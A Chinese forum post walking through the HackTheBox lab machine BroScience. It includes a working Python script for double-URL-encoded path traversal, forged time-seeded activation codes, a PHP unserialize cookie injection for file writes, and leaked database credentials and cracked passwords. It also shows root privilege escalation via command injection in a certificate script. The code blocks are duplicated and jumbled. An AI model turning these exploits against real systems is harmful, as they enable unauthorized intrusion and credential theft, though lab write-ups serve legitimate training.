-
-
[原创]HTB BroScience (MEDIUM)
-
发表于: 2023-2-15 23:24
-
域名https://broscience.htb/
扫目录下,站点上php的,扫下php的文件
访问includes目录可以直接看到
Missing 'path' parameter.可能存在文件包含
尝试path=../../../../etc/passwd
尝试绕过,urlencode两次后成功
可以创建一个Python脚本,使DoubleUrlenode和请求实现自动化
utils.php有根据时间激活账户的功能
使用相同的方式来制作激活码
nJtB6ePyeQMj1XhptS0poMBMhncDC2of
再看下activate.php中的内容
向activate.php发送code
在utils.php找到了get_theme函数。通过使用非结构化cookie,可以注入PHP并获得访问权限
还发现了在本地保存文件的Avatar和AvatarInterface类
现在我们只需要修改TMP和IMGPath变量,使其指向我们,并最终序列化数据
查看db_connect.php可以获得数据库账号密码等信息
dbuser:RangeOfMotion%777
拿到hash后,对字典加salt值后破解
NaCliluvhorsesandgym ( bill)
NaClAaronthehottest ( dmytro)
NaCl2applesplus2apples ( michael)
取出前面的salt便可登录
运行linpeas.sh可以看到以root权限运行的renew_cert.sh
通过脚本中的命令可以生成一个所有字段为空,但是可以在Common Name中执行命令
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
/bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
参考链接:https://medium.com/@Kushagra007/broscience-hackthebox-d26fa3e24ab
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/raft-medium-directories.txt -u https://broscience.htb/FUZZ.php
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/raft-medium-directories.txt -u https://broscience.htb/FUZZ.php
#!/usr/bin/python3import requests, sys, warnings
warnings.simplefilter("ignore")
if len(sys.argv) < 2:
print(f"\n\033[1;37m[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <file>\n")
exit(1)
def doubleurlencode(string):
urlencode = ""
for character in string:
decimal = ord(character)
urlencode += "%" + hex(decimal)[2:]
double = ""
for character in urlencode:
decimal = ord(character)
double += "%" + hex(decimal)[2:]
return double
dpt = doubleurlencode("../../../../")
file = doubleurlencode(sys.argv[1])
target = "https://broscience.htb/includes/img.php?path="
request = requests.get(target + dpt + file, verify=False)
response = request.text
print(response.strip())
#!/usr/bin/python3import requests, sys, warnings
warnings.simplefilter("ignore")
if len(sys.argv) < 2:
print(f"\n\033[1;37m[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <file>\n")
exit(1)
def doubleurlencode(string):
urlencode = ""
for character in string:
decimal = ord(character)
urlencode += "%" + hex(decimal)[2:]
double = ""
for character in urlencode:
decimal = ord(character)
double += "%" + hex(decimal)[2:]
return double
dpt = doubleurlencode("../../../../")
file = doubleurlencode(sys.argv[1])
target = "https://broscience.htb/includes/img.php?path="
request = requests.get(target + dpt + file, verify=False)
response = request.text
print(response.strip())
<?phpfunction generate_activation_code() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(time());
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
function rel_time($from, $to = null) {
$to = (($to === null) ? (time()) : ($to));
$to = ((is_int($to)) ? ($to) : (strtotime($to)));
$from = ((is_int($from)) ? ($from) : (strtotime($from)));
$units = array
(
"year" => 29030400, // seconds in a year (12 months)
"month" => 2419200, // seconds in a month (4 weeks)
"week" => 604800, // seconds in a week (7 days)
"day" => 86400, // seconds in a day (24 hours)
"hour" => 3600, // seconds in an hour (60 minutes)
"minute" => 60, // seconds in a minute (60 seconds)
"second" => 1 // 1 second
);
$diff = abs($from - $to);
if ($diff < 1) {
return "Just now";
}
$suffix = (($from > $to) ? ("from now") : ("ago"));
$unitCount = 0;
$output = "";
foreach($units as $unit => $mult)
if($diff >= $mult && $unitCount < 1) {
$unitCount += 1;
// $and = (($mult != 1) ? ("") : ("and "));
$and = "";
$output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
$diff -= intval($diff / $mult) * $mult;
}
$output .= " ".$suffix;
$output = substr($output, strlen(", "));
return $output;
}class UserPrefs {
public $theme;
public function __construct($theme = "light") {
$this->theme = $theme;
}
}function get_theme() { if (isset($_SESSION['id'])) {
if (!isset($_COOKIE['user-prefs'])) {
$up_cookie = base64_encode(serialize(new UserPrefs()));
setcookie('user-prefs', $up_cookie);
} else {
$up_cookie = $_COOKIE['user-prefs'];
}
$up = unserialize(base64_decode($up_cookie));
return $up->theme;
} else {
return "light";
}
}function get_theme_class($theme = null) {
if (!isset($theme)) {
$theme = get_theme();
}
if (strcmp($theme, "light")) {
return "uk-light";
} else {
return "uk-dark";
}
}function set_theme($val) { if (isset($_SESSION['id'])) {
setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
}
}class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}class AvatarInterface {
public $tmp;
public $imgPath;
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}?><?phpfunction generate_activation_code() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(time());
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
function rel_time($from, $to = null) {
$to = (($to === null) ? (time()) : ($to));
$to = ((is_int($to)) ? ($to) : (strtotime($to)));
$from = ((is_int($from)) ? ($from) : (strtotime($from)));
$units = array
(
"year" => 29030400, // seconds in a year (12 months)
"month" => 2419200, // seconds in a month (4 weeks)
"week" => 604800, // seconds in a week (7 days)
"day" => 86400, // seconds in a day (24 hours)
"hour" => 3600, // seconds in an hour (60 minutes)
"minute" => 60, // seconds in a minute (60 seconds)
"second" => 1 // 1 second
);
$diff = abs($from - $to);
if ($diff < 1) {
return "Just now";
}
$suffix = (($from > $to) ? ("from now") : ("ago"));
$unitCount = 0;
$output = "";
foreach($units as $unit => $mult)
if($diff >= $mult && $unitCount < 1) {
$unitCount += 1;
// $and = (($mult != 1) ? ("") : ("and "));
$and = "";
$output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
$diff -= intval($diff / $mult) * $mult;
}
$output .= " ".$suffix;
$output = substr($output, strlen(", "));
return $output;
}class UserPrefs {
public $theme;
public function __construct($theme = "light") {
$this->theme = $theme;
}
}function get_theme() { if (isset($_SESSION['id'])) {
if (!isset($_COOKIE['user-prefs'])) {
$up_cookie = base64_encode(serialize(new UserPrefs()));
setcookie('user-prefs', $up_cookie);
} else {
$up_cookie = $_COOKIE['user-prefs'];
}
$up = unserialize(base64_decode($up_cookie));
return $up->theme;
} else {
return "light";
}
}function get_theme_class($theme = null) {
if (!isset($theme)) {
$theme = get_theme();
}
if (strcmp($theme, "light")) {
return "uk-light";
} else {
return "uk-dark";
}
}function set_theme($val) { if (isset($_SESSION['id'])) {
setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
}
}class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}class AvatarInterface {
public $tmp;
public $imgPath;
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}?>python bor.py /var/www/html/includes/utils.php | head -n10
<?phpfunction generate_activation_code() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(time());
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}python bor.py /var/www/html/includes/utils.php | head -n10
<?phpfunction generate_activation_code() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(time());
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}<?php$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(strtotime("Wed, 15 Feb 2023 14:32:36 GMT"));
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}echo $activation_code;?><?php$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(strtotime("Wed, 15 Feb 2023 14:32:36 GMT"));
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}echo $activation_code;?>python bor.py /var/www/html/activate.php | head -n10
<?phpsession_start();// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}if (isset($_GET['code'])) {
// Check if code is formatted correctly (regex)
python bor.py /var/www/html/activate.php | head -n10
<?phpsession_start();
最后于 2023-2-16 11:56
被hml189编辑
,原因:
赞赏记录
参与人
雪币
留言
时间
gid
为你点赞~
2023-3-18 17:25
PLEBFE
为你点赞~
2023-2-17 10:27
hml189
为你点赞~
2023-2-16 11:07
zhczf
为你点赞~
2023-2-16 08:22
|
|
|---|---|
